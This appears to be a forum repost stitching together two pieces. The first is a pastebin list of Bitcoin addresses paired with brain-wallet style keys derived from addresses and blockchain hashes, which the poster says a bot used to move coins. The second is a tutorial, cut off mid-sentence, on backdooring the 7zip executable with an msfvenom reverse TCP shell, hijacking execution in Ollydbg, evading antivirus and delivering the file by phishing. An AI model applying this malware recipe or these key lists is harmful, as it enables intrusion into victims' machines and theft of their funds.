Most of these came from a scan I did of old transactions, not while my bot was running. Blockchain.info told me they do not appear to have been generated by their system. Also, the list of addresses I"m providing are only the subset that have already had some BTC transacted through them. There are likely hundreds more lying dormant inside people's wallets that have not been used yet. Here is the list: 1G2rM4DVncEPJZwz1ubkX6hMzg5dQYxw7b Sha256(1PoHkMExsXDDBxpAwWhzkrM8fabmcPt6f4) 1Kap8hRf8G71kmnE9WKSBp5cJehvTEMVvD Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1LsFFH9yPMgzSzar23Z1XM2ETHyVDGoqd5 Sha256(1FDWY63R3M87KkW2CBWrdDa4h8cZCiov9p) 13eYNM5EpdJS7EeuDefQZmqaokw21re4Ci Sha256(1E7kRki9kJUMYGaNjpvP7FvCmTcQSih7ii) 1CcSiLzGxXopBeXpoNSchagheK9XR61Daz Sha256(191XapdsjZJjReJUbQiWAH3ZVyLcxtcc1Y) 1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD Sha256(16fawJbgd3hgn1vbCb66o8Hx4rn8fWzFfG) 1A17F9NjArUGhkkiATyq4p8hVVEh2GrVah Sha256(1Je3tz5caVsqyjmGgGQV1D59qsCcQYFxAW) 1GGFXUL1GoHcEfVmmQ97getLvnv6eF98Uu Sha256(1DCfq8siEF698EngecE69GxaCqDmQ2dqvq) 14XxBoGgaJd1RcV3TP8M4qeKKFL9yUcef1 Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 18VZKyyjNR8pZCsdshgto2F1XWCznxs86P Sha256(1FEwM9bq3BnmPLWw5vn162aBKjoYYBfyyi) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 19T6HNnmMqEcnSZBVb1BNA6PrAKd5P2qZg Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 1MWBsFxWJrNtK2cN2Vt7j3a9r5ubfn41nx Sha256(16era4SgYEcbZD1pu6oCBXGXjK2wSrePe8) 1Ns55SngRhshA8kEnyuQ9ELZZPN7ubYfQJ Sha256(1NiNja1bUmhSoTXozBRBEtR8LeF9TGbZBN) 13CnacdjvuuTJkCWrZf33yMrQh5aVX5B14 Sha256(1KPDwnrzJAfD2V4oiPf55WBTAi6UJDvMjN) 1MG1dTqtWVNqq3Qht88Jrie7SXp2ZVkQit Sha256(1UvM3rBJ8Sa1anQ8Du1mj5QZapFmWF7vH) 1DBXjdbMWXmgt81E1W7AYRANVPiq12LsGd Sha256(1Poi5SE42WVR2GKPrwp9U3wYqEBLN6ZV1c) 1GUgTVeSFd2L5zQvpYdQNhPBJPi8cN3i4u Sha256(1EjWVhiTyCdpTa29JJxAVLq27wP4qbtTVY) 1JQ2shEPzkd3ZL3ZQx7gmmxFLvyhSg14cb Sha256(1KEkEmadjTYHCiqhSfourDXavUxaiwoX7f) 125PcPD4QXzgDwNPForSFji8PPZVDr2xkp Sha256(1GRdTKgSq5sY3B4PiALPjKTXSXPXs6Ak7X) 1kN83e7WRtsXD7nHn51fwdEAi51qk5dEe Sha256(1JcsBzKio1curbu9AtxTySxddvT4MKT3Da) 1L5pzdXL4hhtMHNxFXHjjdhhSidY9kJVRk Sha256(1V8tWZw4J3G5kBgafGsfoVSNQEgkxDmeA) 1cQH5XCsezkKt9zpwjHizz8YJZudDSwri Sha256(1AYKSUqCtDX1E34q4YoFnjwWSj41huWgGG) 1DHWP6UjSKBBUR8WzTviWAGNgLfDc6V6iL Sha256(1MbzspFCdXjtqAUx3t6A11vzrk5c847mvE) 1EqSvLnMhbRoqZkYBPapYmUjMS9954wZNR Sha256(1XAeTJCaYJgoBDwqC1rhPhu3oXiKuMs9C) 1MJKz1M7dEQCHPdV5zrLSQPa4BGFAuNJyP Sha256(1BxzenHnSuKwqANALE5THeTCSRZkv3ReRP) 18VZG5Dr8bYJWadHUgh7kC4RPS1VsvH4Ks Sha256(1qA59Na3WysruJbCPoomryDRCtJ4f4aLu) 1CoyRECWJ4LHNiZAgAz9719chFkrDJuNMC Sha256(19o4Yjrd74qnZ3z87C67BShbbF4fSNHy8W) 1ERKXYeaCy97KPdJTRbWjJDVzMbStJYqCm Sha256(1DMwZeQJXfWToRRHr5uRiKeucwDWkWLvkm) 1mbcQaPzsaBoaYP4V6uwCA74BRPhroK3r Sha256(1KzSULbG3fRVjWrpVNLpoB6J62xYL42AdN) 1gHad7cKWDcVKFeKcLRW4FhFAyw2R7FQZ Sha256(1LFCEek8FobJRXb5YrzWJ6M2y8Tx2Xg3NB) 1DvtF6X5b9cBrMZa4Yff9tARCLqP5ZyB47 Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE Sha256(19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S) 153jMRXn251WyxT9nmJW2XDsFUJ648jyY5 Sha256(1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu) 1EFBsAdysTf81k72v9Zqsj3NMuo6KoWD2r Sha256(1BBBvd9G5YThYVVMSGSxJzQvQiQm3WxJC2) 14mRxKmeEw9DCBbpR596FYmfZVdBD8MJxh Sha256(1PLpQDyqDUcpK6fWpRhkkFVBw4tSK4sHkS) 1Hg9pi75XWAT9pB3faXQFKKZbh98cbM5m Sha256(1JoshVWQDa7DzXqN3wQ9dbig5WEfaAzHcM) 1PcExYX3mUJ1rwa4aTLNJUpxqRLU8MxPXm Sha256(1LTZ9kaxRHBZH43eSmZ2KoGLHHUBV3P2S5) 1J9SzdYMZFsLqunQfPAswzogLNBitbREMD Sha256(1A7grBEjor6Sapj8KRbEGj2UrbnNt1Usxo) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) 1Q2a1ytfujskCEoXBsjVi1FqKWHegfFKwD 
Sha256(1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE) 1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV Sha256(153jMRXn251WyxT9nmJW2XDsFUJ648jyY5) 1M2uEGihcwUPiRGETE7vF8kUiS2Z4rtV2Q Sha256(1HqQBiqgFK6ChJ2Vq7kbWRCbc73cjyNXv5) 1Kka5bgXvpHTNDsPmhLPHae2qcK9mLS2qS Sha256(1E3D7NabEX971uV2gXT47rWQwPm3zbmvd8) 17hMEK4i8Nsi56huBU4i9N4Gjiw5G6X5iG Sha256(1Nk6a8ZfN86gaHJifcF8iGahx4scCKkwF5) 1DT4Q4ocUFgekXvBqBM6kFmvQYB6Y4PnHo Sha256(19aNbfFfZEWwstuy97C1GsHHELNCxZSEYV) 1CSMVivJfFynvbZRrLFHVGnehpXLUjdGRc Sha256(1p4gsrzTc3mFAgJKYqMzhm6UsJzhgy1KX) 17SaWquajZZBRF5qz6HuXMRt6gvnrDyoqE Sha256(1C1KjGATUXP6L6nnGTAh4LQcnSyLt13XyB) 16eePivj1nTVvLpBGkmFoeGxNyMU7NLbtW Sha256(1K79KaFs4D6wqz1wjP1QoYiY18fw8N3bZo) 1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu Sha256(1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD) 1GSkK6KBVSycEU57iK6fRvSXYJ4dgkkuNt Sha256(1JZwnSQz64N3F9D3E24oS4oGhSxMWDsXYM) 12eGusvkCcJb2GWqFvvE1BLDJ8pVX49fQv Sha256(197HxXUSehthdqXM6aEnA1ScDSCR7tQmP3) 134Kia3XhZV6oXE4EUvjc1ES8S8CY7NioU Sha256(1PVn2gxgYB8EcjkpJshJHfDoBoG8BntZWM) 1HMGSkDB9ZhRoUbSEEG6xR7rs9iPT2Ns5B Sha256(1E4yLggKcgHcpSKX336stXWgheNU2serVz) 13qsbkaJM7TkA5F2dsvHeGVQ7kCo74eGxh Sha256(1FAv42GaDuQixSzEzSbx6aP1Kf4WVWpQUY) 1Jsz6mahqVMJn2ayWzN6TfeWTti9tqfbSM Sha256(18AsiEQoLLKaF4Co1z4rxHyzJu9oqTVbFE) 1BwjscJC3P47uW5GXR7tjeHkdXQk6CuAFb Sha256(1JuP7JXhHabGLVAqp9TJj5N171qLVHrcVq) 17kYPYbELyVfMSYihD4YETJSZq5yCs3diM Sha256(1HzJPqLEpbeXiYhyoA8M8cuuds3FEAnw3B) 1C9HtVz7H8NArfV613wQNHs4PrK2oLZEYh Sha256(1EGeEk4YUrXyDL4zNXpWdqJopoVxs2vExJ) 16bEBNuc7JQ4QzyoFAkmxdVvW4wJqicjVN Sha256(12GvGqEQuQTW4Rr8dZ1o397KAYCMGWPYkq) 141V8fK9Kuofit8AXh9SLV9N9bLTfftETA Sha256(15nXjzf8EXy8Lji3czM1HAVw14mEKoEiTw) 19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S Sha256(17FaMY613bKfwhrdTv5PHnucSGTJBcw3k5) 1CRq6nj3a7vXdJJN2YSWdW6fVwydr6kqWs Sha256(1J1ZPHbbEwgcwniH3F7AgBeFZxQXJoKCGf) 1BVNt39u32LLkxMvBeBHXXNaTJqWe1Xcu5 Sha256(17iLALAyra1W5KSUjjkGN5LeUsWdeoQQx3) 1Mpw88XWQzLTZnq1eNs5SegZYGJu5Epky8 Sha256(1LeuaozTUT5UJX6DD4Q1VJsHh6aHpZ3YRU) 1LkwU9xbVroLkH9EvxDfmMnsCikQzaUv9S Sha256(16bEpxSc1FDyQDXR7ZYKbyyDDxzyaaCnNS) 1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ Sha256(137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot) 1KyUNmmJu3JjauVEZQUYLUEBg48GXXS1ii Sha256(17S3XjtEFXQoGdXnUjJJtGB1D7PTa9SsLZ) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot Sha256(1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5) 1FXi6kEJjnZUBqpwjVJKPsgVHKag86k6qq Sha256(1FEYXtchFFJft6myWc6PyxLCzgdd8EHVUK) 1Gj2uRnxDztM7dTDQEUQGfJg4z5RtAhECh Sha256(1ESkNMa9Z37of4QdJmncvibrXxZ7suPjYm) 1JhWnRjRm7AhbvSBtEifcFL8DkEKQiWRZw Sha256(13Q8rTtdGUUt8Q8ywcEffj4oiNrY6ui3cu) 131XQfvE7E1NzdRQnE8XFmtkxWVRXTsb9q Sha256(1FLeb3zCVG63NYAMBiUoqKYgW1tUwgMMfF) 167dyxowdWwBdofck3WuAwvUpVfn2ewx8Q Sha256(1FFAdm2BWoCfTkTwFLJ4o3b5xG7cuRxbWb) 1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9 Sha256(1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1) 14XAGCAeUxieSzvGK3TX915PJLvX54n2Pd Sha256(17XQfW1R66aRBNYyJMwzn7zLf3D6sZgda3) 1M5jhEDKQCYbMCXHgcRUmaxwqYmcbrEfGD Sha256(1AixDffKCd1cV1tz1sp8fwJQDEAYCWzQcR) 1HPnYqbMvV4bGRcpSP28mMyekhjKiudcFY Sha256(1C91NNyzXE1dBC4dDKjx6y5VnhihifrpCY) 15XWgB1biKGd1JyuYecobfFtfBcVt6Jnok Sha256(1268xJ8iYUdRxK2vArkyoa5es6bR99hjhR) 1NHvPBaxKFuDec27mWcyCf7szUUvNnfimK Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1AoocdeZC64PaQ15Gbv1kXyYYnN8FWXAST Sha256(1Et9zapAxsBLJ3bvY7LDTuHif5cH7mZiBE) 1NWCqz8nr8ZRZt1zEKidyWcZDyNtK3THps Sha256(17Xok12pBFkXxNcE8J4gTSm3YKkatyX4ad) 1Lv6T9RegiNHpES1DHu6AasDcUqp2SeqLb Sha256(1LDqitspsYaiLH6AMW5EzJYuZG5vTGzRNg) 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 14JpZ9Bogo4p83xt6cKS1Fh1rLSFRat8PN Sha256(1FBxoyGYaC9GEKLokfyrHUbZyoZmmm1ptJ) 
1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1 Sha256(1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV) 1P9ZZGDG1npYd4d7jiCfPya6LQGkF5sFm7 Sha256(1LFGKkDZ21FZVsBh1A1S5Xr6aXuV3x9N4k) 1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5 Sha256(1LdkWzq9DxopPkY1hCmQ3DezenP5PQLNC3) 15RjQKt6D4HBn87QqgbyvhKFNDDjXncp8Y Sha256(1PhmMsdwamJA6soKw5mNMXxzGomHEHWY5P) 1G7B5eVnAQgeuGrKxcRnrmEqPLsjRkgnVF Sha256(1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ) 192qwAD31JB9jHiAwaTDkd6teb2hLAkY3b Sha256(1PhqA75qNM23aH9zV3uWvUhDbdwcab6q5L) 13mbvCyxCYvATNzranCkQdpCT19VGpMFZa Sha256(1F3sAm6ZtwLAUnj7d38pGFxtP3RVEvtsbV) 1HJx3CqdaHAX6ZYRBHDvM5skg2Vh7GeZBD Sha256(1KrutzZZ7rth6D9wasfGz2oy9R6k1RCL9n) 1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe Sha256(1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9) 1KiGdZ9TUeWyJ3DyHj7LQLZgjvMHd6j2DZ Sha256(18SV4DVmytRDYB5JBAFkewUbVAp6FRpi5c) 13FzEhD3WpX682G7b446NFZV6TXHH7BaQv Sha256(1E1rSGgugyNYF3TTr12pedv4UHoWxv5CeD) 1LVRWmpfKKcRZcKvi5ZGWGx5wU1HCNEdZZ Sha256(1CVPe9A5xFoQBEYhFP46nRrzf9wCS4KLFm) 1HhNZhMm4YFPSFvUXE6wLYPx63BF7MRJCJ Sha256(145Sph2eiNGp5WVAkdJKg9Z2PMhTGSS9iT) 1G6qfGz7eVDBGDJEy6Jw6Gkg8zaoWku8W5 Sha256(18EF7uwoJnKx7YAg72DUv4Xqbyd4a32P9f) 1MNhKuKbpPjELGJA5BRrJ4qw8RajGESLz6 Sha256(15WLziyvhPu1qVKkQ62ooEnCEu8vpyuTR5) 18XAotZvJNoaDKY7dkfNHuTrAzguazetHE Sha256(15SP99eiBZ43SMuzzCc9AaccuTxF5AQaat) 1HamTvNJfggDioTbPgnC2ujQpCj4BEJqu Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 17iqGkzW5Y7miJjd5B2gP5Eztx8kcCDwRM Sha256(1MB3L1eTnHo1nQSN7Lmgepb7iipWqFjhYX) 15M7QfReFDY2SZssyBALDQTFVV1VDdVBLA Sha256(16bjY7SynPYKrTQULjHy8on3WENxCmK4ix) 1LgwKwv9kt8BwVvn6bVWj8KcqpP9JSP1Mh Sha256(1Q81rAHbNebKiNH7HD9Mh2xtH6jgzbAxoF) 1pmZwNDZjpuAqW3LjYYQCEjbQYBtSxzWc Sha256(13PctMqzyBKi5CpZnbastHQURrSRrow4yj) 1qA59Na3WysruJbCPoomryDRCtJ4f4aLu Sha256(1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe) 19QBydCuMiY7aRTbkP2tb3KQJUWkTrr5Xi Sha256(1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T) 11EuerTwe9rxtT3T56ykX5K7J3AksPzU3 Sha256(14PnZgX8ZDABJZ8RnatkK7DQzdpkwRRPX2) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 1Ads6ZWgRbjSCZ37FUqcmk82gvup1gQurB Sha256(1NbBTJQ5azGEA1yhGnLh39fE8YoEbePpCm) 1LWU4SbnqnfctAMbtivp2L98i8hSSCm7u7 Sha256(1MVqDAJo8kbqKfTJWnbuzvfmiUXXBAmX3y) 12B1bUocw8rQefDcYNdckfSLJ6BsUwhRjT Sha256(1Pjg628vjMLBvADrPHsthtzKiryM2y46DG) 12GZz1D1kdX3Fj7M87RFvqubam8iGrK77R Sha256(1Lu49ZKmGoYmW1ji3SEqCGVyYfEw7occ86) 13wY5CtwQhd7LYprEpFpkt1g9R7ErMkAwT Sha256(1NPSWKXdnHa17NWTU3J6nVkyogZjmAh7N6) 1Kc324Y6UUMffeYdtuXgzVC28Kx3U8cqQk Sha256(1HAQB99WfrV2ttRjttUPMzRi4R1uC2ftMy) 1Gwz14Cty45h3hZ4nCEno6jSdxtQn5bc7h Sha256(1PDgY5PkpBNCZVWKKAq3cbGyqvwwN91z4g) 1L2a5n9ar7e2v3Wz6NDFnxisigvR6urGaY Sha256(1KxUVU9DKfdaTLMnXBLS5BZRf56cFnRosk) 1KwUfu3gGk7n8Wz969tAztvvM4Mp4ZY57s Sha256(12XuaKzEheWbFJBno9QiV6kPCWrnWpUYTK) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 1MkaTR3642ofrstePom5bbwGHbuQJmrnGD Sha256(1BynBc2YUAoNcvZLWi24URzMvsk7CUe2rc) 114LdauSAu2FTaR2ChPsPTRRhjYD9PZzn2 Sha256(144BV4Y7tgnetk5tDKAYTGS4mjprA75zJz) 1NzWscae8v3sKmTVJYwq8yhkizK8hUS5qP Sha256(1ENCBKFsqxJVCqR2TS1WfDV3rDi6zA8J6Y) 1FjEL7TBazaJN7WyND4uwq9wiaWDzfizkP Sha256(1PeCGFsJgqz8CcjGugGq5bPBiRDXUZHLUH) 1FP8j4zUPoJkpKwYpd8zYGHVaKygRHzx3d Sha256(1ERdvKTCxP1gZvdNndLKtYotW7qpR3xhuQ) 16nXouTPm5gVedr4Betb8KRWLSBtmXGUbD Sha256(16oTV1jZPJ5wm3QLhN96xVF7DchihmpL1k) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit Sha256(1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo) My bot moved coins from the last two addresses only. (No one has claimed ownership from 16nX). 
All other transfers were the result of other people who either figured this out or are the ones who planted the bad addresses themselves (since 2014). And these are some recent examples of private keys that are based on other information from the blockchain itself (as stated, may be completely unrelated but still happening on a regular basis). 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 txid 1FQ9AneLGfhFf9JT5m5sg5FaYFeJrGmJhS 00000000000000000045fa3492aee311171af6da7d05a76c6eaadab572dc1db9 Block Hash 1DhcPvYWBGwPFEsAJhXgdKtXX7FFGGeFVS 00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048 Block Hash 198MRUHD2cvgUTBKcnroqmoTSs4b8xyLH9 7dac2c5666815c17a3b36427de37bb9d2e2c5ccec3f8633eb91a4205cb4c10ff Markel Root 19FHVnoNYTmFAdC2VC7Az8TbCgrSWSP1ip 000000000000000000db717b4c076da2d1b9ff8ddbc94132e3a8d008a0fb62b9 Block Hash 1Lr2yEny7HYJkXdFgJ2D8zHyNH1uHMi4w4 2bedfd92a6136566bb858b2f0d223744a41a987c468356d069acc86f45bf68ac txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BFYNokepXjbb9Han2AGfSTNKNNU9vgAAn 533da7e41bd99550f63f152ef1e613f1a78e3bed12788664d536c6ec42b5e0aa txid 1MJtsgDNrrFWS3qxtrPr6BnQUdp1qPjyEm 216fb568589629b115b0ed8fc41fdf3219d9ab804c6ce5e53fbc581a88427c3f txid 14syDBvpGXS6PtWytkDJF2QACvSggEZ277 a7f4def1c7ff07d17b5dd58fc92f18ee2dbee6dc7654fd30a8653bd9d848f0a0 txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BkHAUcfrZLRLyXHiBn6XRoppPqSzuf8hE 805cd74ca322633372b9bfb857f3be41db0b8de43a3c44353b238c0acff9d523 txid 1CNgVFjAwHT7kc6uw7DGk42CXf1WbX4JQm 53d348ca871dc1205e778f4d8e66cfdadbd105782dba6688e9a0b4bdee4763e4 txid 1HjDAJiuJ8dda919xwKBqphhEwBVGfzMGt 0aad1b00a5227d9b03d33329a5a11af75c75c878a064c69b276063cbea677514 txid 1PDnrPSCw9eWTtJss4DhYoLTk4WUmZQdBi f87b08218888f97388218d3e2489962403f7eece98dd8b4733671edeb9ad1a7c txid 1MJp4z3ig498hNATfgHBAnLFhwoZpvw118 000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f Block Hash I think this information should be made public so that other backend systems plugged into crypto networks can guard against this sort of 'hide in plain sight' attack. As stated earlier, I honestly set out to look for buried treasure and stumbled upon someone else's exploit. Thanks to yt_coinartist's assistance in making this public. e8d064874c37ce44f13a880b93b548b83342c99e1530dd746322777f88397ed8 Going dark now....bye. Sursa: https://pastebin.com/jCDFcESz
-
Introduction During a penetration testing engagement you may be required to backdoor a specific executable with your own shellcode, without increasing the size of the executable or altering its intended functionality, and hopefully while making it fully undetectable (FUD). How would you do it? For example, after recon, you gather information that a large number of employees use a certain “program/software”. The social engineering way to get into the victim’s network would be a phishing email to employees with a link to download an “updated version of that program”, which is actually a backdoored binary of the updated program. This post will cover how to backdoor a legitimate x86 PE (Portable Executable) file by adding our own reverse TCP shellcode without increasing the size or altering the functionality. Different techniques are also discussed on how to make the backdoored PE fully undetectable (FUD). The focus in each step of the process is to make the backdoored file fully undetectable. The word “undetectable” here is used in the context of scan-time static analysis. An introductory understanding of the PE file format, x86 assembly and debugging is required. Each section builds upon the previous one and, for the sake of conciseness, no topic is repeated; reference back and forth for clarity. Self Imposed Restrictions Our goal is to backdoor a program in a way that it becomes fully undetectable by anti-viruses, and the functionality of the backdoored program should remain the same with no interruptions/errors. For anti-virus scanning purposes we will be using NoDistribute. There are a lot of ways to make a binary undetectable: using crypters that encode the entire program and include a decoding stub in it to decode at runtime, compressing the program using UPX, or using veil-framework or msfvenom encodings. We will not be using any of such tools. The purpose is to keep it simple and elegant! For this reason I have the following self imposed restrictions: No use of msfvenom encoding schemes, crypters, veil-framework or any such fancy tools. The size of the file should remain the same, which means no extra sections, decoder stubs, or compressing (UPX). The functionality of the backdoored program must remain the same with no errors/interruptions. Methods used: Adding a new section header to add shellcode. User-interaction-based shellcode trigger + codecaves. Dual code caves with a custom encoder + triggering shellcode upon user interaction. Criteria for PE file selection for implanting backdoor Unless you are forced to use a specific binary to implant a backdoor, the following points must be kept in mind. They are not required to be followed but preferred, because they will help reduce the AV detection rate and make the end product more feasible. The file size of the executable should be small (< 10 MB); a smaller file will be easy to transfer to the victim during a penetration testing engagement.
You could email them in a ZIP or use other social engineering techniques. Backdoor a well known product, for example uTorrent, network utilities like Putty, sysinternals tools, WinRAR, 7zip etc. Using a known PE file is not required, but an AV is more likely to flag an unknown backdoored PE than a known one, and the victim would be more inclined to execute a known program. Prefer PE files that are not protected by security features such as ASLR or DEP. It would be complicated to backdoor those and it won't make a difference in the end product compared to normal PE files. It is preferable to use native C/C++ binaries. It is preferable to have a PE file that has a legitimate functionality of communicating over the network. This could fool a few anti-viruses upon execution when the backdoor shellcode makes a reverse connection to our desired box. Some anti-viruses would not flag it and would consider it part of the functionality of the program. Chances are network monitoring solutions and people would consider the malicious communication as legitimate functionality. The program we will be backdooring is the 7zip file archiver (GUI version). First let's check if the file has ASLR enabled. ASLR: Randomizes the addresses each time the program is loaded in memory; this way an attacker cannot use hardcoded addresses to exploit flaws or place shellcode. Powershell script result shows no ASLR or DEP security mechanism As we can see in the above screenshot, not much in terms of binary protection. Let's take a look at some other information about the 7zip binary. Static Analysis Static Analysis of 7zip binary The PE file is a 32-bit binary, has a size of about 5 MB, and is programmed in native code (C++). Seems like a good candidate for our backdoor. Let's dig in! Backdooring PE file There are two ways to backdoor Portable Executable (PE) files. Before demonstrating both of them separately it is important to have a sense of what we mean by backdooring a PE file. In simple terms we want a legitimate Windows executable file like the 7zip archiver (used for demonstration) to have our shellcode in it, so when the 7zip file is executed our shellcode should get executed as well, without the user knowing and without the anti-viruses detecting any malicious behavior. The program (7zip) should work accurately as well. The shellcode we will be using is a stageless msfvenom reverse TCP shell. Follow this link to learn the difference between staged and stageless payloads. Both of the methods described below have the same overall process and goal but different approaches to achieve it. The overall process is as follows: Find an appropriate place in memory for implanting our shellcode, either in codecaves or by creating a new section header; both methods are demonstrated below. Copy the opcodes at the beginning of program execution. Replace those instructions with our own opcodes to hijack the execution flow of the application to our desired location in memory. Add the shellcode to that memory location, which in this case is a stageless TCP reverse shell. Restore the registers and the instructions copied in the first step to allow normal execution flow. Adding a new Section header method The idea behind this method is to create a new header section in the PE file, add our shellcode in the newly created section and later point the execution flow to that section. The new section header can be created using a tool such as LordPE.
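Before firing up LordPE, it can help to dump the existing section table and the ASLR/DEP flags programmatically. A minimal sketch (my own addition, not part of the original article) using the third-party pefile package; the file name is just an example path.

import pefile

DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -> ASLR
NX_COMPAT    = 0x0100   # IMAGE_DLLCHARACTERISTICS_NX_COMPAT    -> DEP

pe = pefile.PE("7zFM.exe")
chars = pe.OPTIONAL_HEADER.DllCharacteristics
print("ASLR:", bool(chars & DYNAMIC_BASE))
print("DEP: ", bool(chars & NX_COMPAT))

# list each section with its virtual address, raw size and characteristics flags
for section in pe.sections:
    print(section.Name.rstrip(b"\x00").decode(errors="replace"),
          hex(section.VirtualAddress), hex(section.SizeOfRawData),
          hex(section.Characteristics))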
Open LordPE, go to the section header view and add a section header (we added .hello) at the bottom. Add a Virtual size and Raw size of 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). Make the section header executable: we have to place our shellcode in this section, so it has to be executable, writable and readable. Save the file as original. Adding a new header section Now if we execute the file, it won't work, because we have added a new section of 1000h bytes but that header section is empty. Binary not executing because of empty header section To make the file work normally as intended, we have to add 1000h bytes at the end of the file: right now the file declares a header section of 1000h bytes but that data doesn't exist yet, so we have to fill it up with some value, and we are filling it up with nulls (00). Use any hex editor to add 1000h bytes at the end of the file as shown below. Adding 1000h bytes at the end of the file We have added null values at the end of the file and renamed it 7zFMAddedSection.exe. Before proceeding further we have to make sure our executable 7zFMAddedSection.exe is working properly and our new section with the proper size and permissions is added; we can do that in Ollydbg by going to the memory section and double clicking PE headers. PE Headers in Ollydbg Hijack Execution Flow We can see that our new section .hello is added with the designated permissions. The next step is to hijack the execution flow of the program to our newly added .hello section. When we execute the program it should jump to the .hello section of the code where we will place our shellcode. First note down the first 5 opcodes, as we will need them later when restoring the execution flow. We copy the starting address of the .hello section, 0047E000, open the program in Ollydbg and replace the first opcode at address 004538D8 with a JMP to 0047E000. Replacing the starting address with JMP to new section Right click -> Copy to executable -> all modifications -> Save file. We saved the file as 7zFMAddedSectionHijacked.exe (file names getting longer and we are just getting started!). Up till now we have added a new header section and hijacked the execution flow to it. We open the file 7zFMAddedSectionHijacked.exe in Ollydbg. We are expecting the execution flow to redirect to our newly added .hello section, which would contain null values (remember we added nulls using hexedit?). Starting of .hello section Sweet! We have a long, empty .hello section. The next step is to add our shellcode from the start of this section so it gets triggered when the binary is executed. Adding Shellcode As mentioned earlier we will be using Metasploit's stageless windows/shell_reverse_tcp shellcode. We are not using any encoding schemes provided by msfvenom; most of them, if not all of them, are already flagged by anti-viruses. To add the shellcode we first need to push the registers onto the stack to save their state using the PUSHAD and PUSHFD opcodes. At the end of the shellcode we pop the registers back and restore the execution flow by pasting the initial (pre-hijack) program instructions copied earlier and jumping back, to make sure the functionality of 7zip is not disturbed. Here is the sequence of instructions PUSHAD PUSHFD Shellcode.... POPFD POPAD Restore Execution Flow...
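As a byte-level illustration of that sequence (my own sketch, not part of the original tutorial): PUSHAD is 0x60, PUSHFD is 0x9C, POPFD is 0x9D and POPAD is 0x61, so the blob pasted into the new section is simply the shellcode sandwiched between them; the five restored instructions and the JMP back are appended afterwards in Ollydbg.

# Wrap raw shellcode bytes with a register/flags save and restore.
# 'shellcode' stands for the bytes generated with msfvenom in the next step.
PUSHAD, PUSHFD = b"\x60", b"\x9c"
POPFD, POPAD = b"\x9d", b"\x61"

def wrap_shellcode(shellcode: bytes) -> bytes:
    return PUSHAD + PUSHFD + shellcode + POPFD + POPAD

print(wrap_shellcode(b"\x90\x90").hex())   # dummy two-NOP payload, just to show the layout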
We generate windows stageless reverse shellcode using the following arguments in msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.128 LPORT=8080 -a x86 --platform windows -f hex Copy the shellcode and paste the hex in Ollydbg via right click > binary > binary paste; it will get disassembled to assembly code. Added shellcode at the start of .hello section Modifying shellcode Now that we have our reverse TCP shellcode in the .hello section it's time to save the changes to the file, but before that we need to perform some modifications to our shellcode. At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after the shellcode is executed, and we don't want the program execution to terminate; in fact we want the program to function normally after the shellcode execution. For this reason we have to modify the opcode CALL EBP to NOP (no operation). Another modification that needs to be made is due to the presence of a WaitForSingleObject call in our shellcode. The WaitForSingleObject function takes an argument in milliseconds and waits for that amount of time before starting other threads. If the 